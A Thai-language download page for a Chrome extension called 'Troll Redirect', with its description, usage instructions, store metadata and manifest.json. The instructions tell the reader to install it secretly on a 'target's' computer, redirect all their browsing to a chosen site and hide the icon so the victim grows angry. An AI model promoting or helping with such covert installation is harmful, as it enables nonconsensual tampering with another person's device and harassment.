Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Troll Redirectคืออะไร?

Troll Redirect เป็นส่วนขยายของ Chrome ที่พัฒนาโดย Aaron Lockhart และคุณลักษณะหลักของมันคือ "Redirect all of your friend's webpages automatically by installing this on their computer!"

ภาพหน้าจอของส่วนขยาย

screenshot

ดาวน์โหลดไฟล์ CRX ของส่วนขยาย Troll Redirect

ดาวน์โหลดไฟล์ส่วนขยาย Troll Redirect ในรูปแบบ crx และติดตั้งส่วนขยาย Chrome ด้วยตนเองในเบราว์เซอร์หรือแชร์ไฟล์ crx กับเพื่อนๆ เพื่อติดตั้งส่วนขยาย Chrome อย่างง่ายดาย

คำแนะนำในการใช้ส่วนขยาย

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

ข้อมูลพื้นฐานของส่วนขยาย

ชื่อ Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
URL อย่างเป็นทางการ https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
คำอธิบาย Redirect all of your friend's webpages automatically by installing this on their computer!
ขนาดไฟล์ 949 KB
จำนวนการติดตั้ง 192
เวอร์ชันปัจจุบัน 1.0
อัปเดตครั้งล่าสุด 2018-12-06
วันที่เผยแพร่ 2018-12-02
คะแนน 4.75/5 รวมทั้งหมด 4 คะแนน
ผู้พัฒนา Aaron Lockhart
อีเมล [email protected]
ประเภทการชำระเงิน free
ภาษาที่รองรับ en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}